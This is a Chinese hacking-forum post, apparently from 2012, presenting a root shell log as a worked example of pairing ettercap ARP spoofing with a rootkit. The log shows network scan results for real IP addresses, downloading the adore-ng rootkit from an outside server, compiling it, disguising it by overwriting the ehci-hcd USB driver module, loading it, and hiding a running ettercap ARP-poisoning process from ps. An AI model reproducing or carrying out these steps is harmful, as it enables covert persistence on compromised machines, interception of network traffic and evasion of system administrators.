切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
375 ETTERCAP 配合ROOTKIT 持续ARP[复制链接]
发表于 2012-12-15 19:56:41 | 显示全部楼层 |!read_mode!
一个例子 ROOTKIT用法
  1. ==================================================
  2. IP address   : 202.197.247.139

  3. DISTANCE     : 3   
  4. TYPE         : REMOTE host

  5. FINGERPRINT      :
  6. OPERATING SYSTEM : UNKNOWN

  7.    PORT     : UDP 138 | netbios-dgm         []


  8. ==================================================

  9. ==================================================
  10. IP address   : 202.197.247.153

  11. DISTANCE     : 3   
  12. TYPE         : REMOTE host

  13. FINGERPRINT      :
  14. OPERATING SYSTEM : UNKNOWN

  15.    PORT     : UDP 138 | netbios-dgm         []


  16. ==================================================

  17. ==================================================
  18. IP address   : 202.197.247.178

  19. DISTANCE     : 3   
  20. TYPE         : REMOTE host

  21. FINGERPRINT      :
  22. OPERATING SYSTEM : UNKNOWN

  23.    PORT     : UDP 138 | netbios-dgm         []


  24. ==================================================

  25. ==================================================
  26. IP address   : 202.197.247.198

  27. DISTANCE     : 3   
  28. TYPE         : REMOTE host

  29. FINGERPRINT      :
  30. OPERATING SYSTEM : UNKNOWN

  31.    PORT     : UDP 138 | netbios-dgm         []


  32. ==================================================

  33. ==================================================
  34. IP address   : 202.197.247.220

  35. DISTANCE     : 3   
  36. TYPE         : REMOTE host

  37. FINGERPRINT      : FFFF:05B4:40:00:1:1:1:0:S:34
  38. OPERATING SYSTEM : unknown fingerprint (please submit it)
  39. NEAREST ONE IS   : Openbsd 2.9

  40.    PORT     : UDP 138 | netbios-dgm         []


  41. ==================================================

  42. ==================================================
  43. IP address   : 218.107.220.182
  44. Hostname     : cloud.safedog.cn

  45. DISTANCE     : 16   
  46. TYPE         : REMOTE host

  47. FINGERPRINT      : 16D0:05A8:40:WS:0:0:1:0:A:2C
  48. OPERATING SYSTEM : unknown fingerprint (please submit it)
  49. NEAREST ONE IS   : Linux 2.4.xx  

  50.    PORT     : TCP 80 | http         [nginx]


  51. ==================================================



  52. [root@viewjpkc bin]# cd ..
  53. [root@viewjpkc e]# wget http://v5.dy007.com/Inc/adore-ng-0.56.zip
  54. --2012-11-27 22:25:42--  http://v5.dy007.com/Inc/adore-ng-0.56.zip
  55. ���ڽ������� v5.dy007.com... 113.105.152.191
  56. Connecting to v5.dy007.com|113.105.152.191|:80... �����ӡ�
  57. �ѷ��� HTTP ���������ڵȴ���Ӧ... 200 OK
  58. ���ȣ�48250 (47K) [application/x-zip-compressed]
  59. Saving to: `adore-ng-0.56.zip'

  60. 100%[=================================================================================================================>] 48,250      --.-K/s   in 0.1s   

  61. 2012-11-27 22:25:42 (357 KB/s) - `adore-ng-0.56.zip' saved [48250/48250]

  62. [root@viewjpkc e]# unzip adore-ng-0.56.zip
  63. Archive:  adore-ng-0.56.zip
  64.    creating: adore-ng-0.56/
  65.   inflating: adore-ng-0.56/.adore-ng-2.6.ko.cmd  
  66.   inflating: adore-ng-0.56/.adore-ng-2.6.mod.o.cmd  
  67.   inflating: adore-ng-0.56/.adore-ng-2.6.o.cmd  
  68.    creating: adore-ng-0.56/.tmp_versions/
  69.   inflating: adore-ng-0.56/.tmp_versions/adore-ng-2.6.mod  
  70.   inflating: adore-ng-0.56/adore-ng-2.6.c  
  71.   inflating: adore-ng-0.56/adore-ng-2.6.c~  
  72.   inflating: adore-ng-0.56/adore-ng-2.6.mod.c  
  73.   inflating: adore-ng-0.56/adore-ng.c  
  74.   inflating: adore-ng-0.56/adore-ng.h  
  75.   inflating: adore-ng-0.56/adore-ng.mod.c  
  76.   inflating: adore-ng-0.56/ava.c     
  77.   inflating: adore-ng-0.56/Changelog  
  78.   inflating: adore-ng-0.56/cleaner.c  
  79.   inflating: adore-ng-0.56/configure  
  80.    creating: adore-ng-0.56/CVS/
  81.   inflating: adore-ng-0.56/CVS/Entries  
  82. extracting: adore-ng-0.56/CVS/Repository  
  83. extracting: adore-ng-0.56/CVS/Root  
  84. extracting: adore-ng-0.56/CVS/Tag   
  85.   inflating: adore-ng-0.56/FEATURES  
  86.   inflating: adore-ng-0.56/irq_vectors.h  
  87.   inflating: adore-ng-0.56/libinvisible.c  
  88.   inflating: adore-ng-0.56/libinvisible.h  
  89.   inflating: adore-ng-0.56/LICENSE   
  90.   inflating: adore-ng-0.56/Makefile  
  91.   inflating: adore-ng-0.56/Makefile.2.6  
  92.   inflating: adore-ng-0.56/Makefile.2.6.gen  
  93.   inflating: adore-ng-0.56/Makefile.gen  
  94. extracting: adore-ng-0.56/Module.symvers  
  95.   inflating: adore-ng-0.56/README   
  96.   inflating: adore-ng-0.56/README.26  
  97.   inflating: adore-ng-0.56/relink26  
  98.   inflating: adore-ng-0.56/startadore  
  99.   inflating: adore-ng-0.56/symsed   
  100.   inflating: adore-ng-0.56/symsed.c  
  101.   inflating: adore-ng-0.56/visible-start.c  
  102. [root@viewjpkc e]# cd adore-ng-0.56
  103. [root@viewjpkc adore-ng-0.56]# make
  104. cc -DELITE_UID=2618748389U -DELITE_GID=4063569279U -DCURRENT_ADORE=56 -DADORE_KEY=\"fgjgggfd\" -D__SMP__                         -DMODIFY_PAGE_TABLES -DFOUR_LEVEL_PAGING ava.c libinvisible.c -o ava
  105. make -C /lib/modules/2.6.18-164.el5/build M=/usr/local/lib/p/e/adore-ng-0.56 modules
  106. make[1]: Entering directory `/usr/src/kernels/2.6.18-164.el5-x86_64'
  107.   CC [M]  /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.o
  108. �ڰ����� /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c��54 ���ļ���:
  109. /usr/local/lib/p/e/adore-ng-0.56/adore-ng.h:59:1: ���棺��MODIFY_PAGE_TABLES���ض��
  110. <command line>:1:1: ���棺������ǰ������λ�
  111. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c: In function ��adore_proc_readdir��:
  112. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c:234: ���棺���ݲ��� 3 (���� ��orig_proc_readdir��)ʱ�ڲ����ݵ�ָ�����ͼ�ת��
  113. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c: In function ��adore_opt_readdir��:
  114. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c:295: ���棺���ݲ��� 3 (���� ��orig_opt_readdir��)ʱ�ڲ����ݵ�ָ�����ͼ�ת��
  115. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c: In function ��adore_root_readdir��:
  116. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c:378: ���棺���ݲ��� 3 (���� ��orig_root_readdir��)ʱ�ڲ����ݵ�ָ�����ͼ�ת��
  117. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c: In function ��patch_vfs��:
  118. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c:396: ���棺��ֵ������ָ��Ŀ�����͵��޶�
  119. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c: In function ��unpatch_vfs��:
  120. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c:415: ���棺��ֵ������ָ��Ŀ�����͵��޶�
  121. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c: In function ��adore_init��:
  122. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c:502: ���棺��ֵ������ָ��Ŀ�����͵��޶�
  123. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c: In function ��adore_cleanup��:
  124. /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.c:534: ���棺��ֵ������ָ��Ŀ�����͵��޶�
  125.   Building modules, stage 2.
  126.   MODPOST
  127. WARNING: /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.o - Section mismatch: reference to .exit.text:cleanup_module from .text between 'adore_lookup' (at offset 0x899) and 'adore_opt_filldir'
  128.   CC      /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.mod.o
  129.   LD [M]  /usr/local/lib/p/e/adore-ng-0.56/adore-ng-2.6.ko
  130. make[1]: Leaving directory `/usr/src/kernels/2.6.18-164.el5-x86_64'
  131. [root@viewjpkc adore-ng-0.56]# ls
  132. CVS                 Module.symvers      adore-ng.c          libinvisible.h
  133. Changelog           README              adore-ng.h          relink26
  134. FEATURES            README.26           adore-ng.mod.c      startadore
  135. LICENSE             adore-ng-2.6.c      ava                 symsed
  136. Makefile            adore-ng-2.6.c~     ava.c               symsed.c
  137. Makefile.2.6        adore-ng-2.6.ko     cleaner.c           visible-start.c
  138. Makefile.2.6.gen    adore-ng-2.6.mod.c  configure
  139. Makefile.gen        adore-ng-2.6.mod.o  irq_vectors.h
  140. Module.markers      adore-ng-2.6.o      libinvisible.c
  141. [root@viewjpkc adore-ng-0.56]# ls -la *.ko
  142. -rw-r--r--   1 root     root       297372 Nov 27 22:26 adore-ng-2.6.ko
  143. [root@viewjpkc adore-ng-0.56]# lsmod | sort -r -k 3 | tail -5
  144. ata_piix               56901  0
  145. asus_acpi              50917  0
  146. acpi_memhotplug        40261  0
  147. acpi_cpufreq           47937  0
  148. ac                     38729  0
  149. [root@viewjpkc adore-ng-0.56]# uname -a
  150. Linux viewjpkc 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
  151. [root@viewjpkc adore-ng-0.56]# lsmod | sort -r -k 3 | tail -5
  152. [root@viewjpkc adore-ng-0.56]# cp adore-ng-2.6.ko /lib/modules/2.6.18-164.el5/
  153. build/               modules.alias        modules.ieee1394map  modules.ofmap        modules.symbols      updates/            
  154. extra/               modules.ccwmap       modules.inputmap     modules.pcimap       modules.usbmap       weak-updates/        
  155. kernel/              modules.dep          modules.isapnpmap    modules.seriomap     source/              
  156. [root@viewjpkc adore-ng-0.56]# cp adore-ng-2.6.ko /lib/modules/2.6.18-164.el5/
  157. build/               modules.alias        modules.ieee1394map  modules.ofmap        modules.symbols      updates/            
  158. extra/               modules.ccwmap       modules.inputmap     modules.pcimap       modules.usbmap       weak-updates/        
  159. kernel/              modules.dep          modules.isapnpmap    modules.seriomap     source/              
  160. [root@viewjpkc adore-ng-0.56]# cp adore-ng-2.6.ko /lib/modules/2.6.18-164.el5/kernel/drivers/usb/host/
  161. ehci-hcd.ko     isp116x-hcd.ko  ohci-hcd.ko     sl811_cs.ko     sl811-hcd.ko    uhci-hcd.ko     
  162. [root@viewjpkc adore-ng-0.56]# cp adore-ng-2.6.ko /lib/modules/2.6.18-164.el5/kernel/drivers/usb/host/ehci-hcd.ko
  163. cp���Ƿ&#494776;ǡ�/lib/modules/2.6.18-164.el5/kernel/drivers/usb/host/ehci-hcd.ko��? y
  164. [root@viewjpkc adore-ng-0.56]# cp adore-ng-2.6.ko /lib/modules/2.6.18-164.el5/kernel/drivers/usb/host/ehci-hcd.ko
  165. cp���Ƿ&#494776;ǡ�/lib/modules/2.6.18-164.el5/kernel/drivers/usb/host/ehci-hcd.ko��? y
  166. [root@viewjpkc adore-ng-0.56]# modprobe -r ehci-hcd
  167. [root@viewjpkc adore-ng-0.56]# modprobe ehci-hcd
  168. [root@viewjpkc adore-ng-0.56]# ls
  169. CVS                 Module.symvers      adore-ng.c          libinvisible.h
  170. Changelog           README              adore-ng.h          relink26
  171. FEATURES            README.26           adore-ng.mod.c      startadore
  172. LICENSE             adore-ng-2.6.c      ava                 symsed
  173. Makefile            adore-ng-2.6.c~     ava.c               symsed.c
  174. Makefile.2.6        adore-ng-2.6.ko     cleaner.c           visible-start.c
  175. Makefile.2.6.gen    adore-ng-2.6.mod.c  configure
  176. Makefile.gen        adore-ng-2.6.mod.o  irq_vectors.h
  177. Module.markers      adore-ng-2.6.o      libinvisible.c
  178. [root@viewjpkc adore-ng-0.56]# ps -ef | grep ettercap
  179. Unknown HZ value! (1599) Assume 100.
  180. #65534   31630 31602 35 22:19 pts/4    00:03:04 ./ettercap -T -M arp // // -q -i
  181. root     31848 20696  0 22:27 pts/1    00:00:00 grep ettercap
  182. [root@viewjpkc adore-ng-0.56]# ./ava i 31630
  183. Checking for adore  0.12 or higher ...
  184. Adore 1.56 installed. Good luck.
  185. Made PID 31630 invisible.
  186. [root@viewjpkc adore-ng-0.56]# ps -ef | grep ettercap
  187. Unknown HZ value! (1599) Assume 100.
  188. root     31858 20696  0 22:28 pts/1    00:00:00 grep ettercap
  189. [root@viewjpkc adore-ng-0.56]# screen -ls
  190. There is a screen on:
  191.         31601.pts-1.viewjpkc        (Detached)
  192. 1 Socket in /var/run/screen/S-root.

  193. [root@viewjpkc adore-ng-0.56]# screen -r 31601

  194. [3]+  Stopped                 screen -r 31601
  195. [root@viewjpkc adore-ng-0.56]#
复制代码



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-25 08:29

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部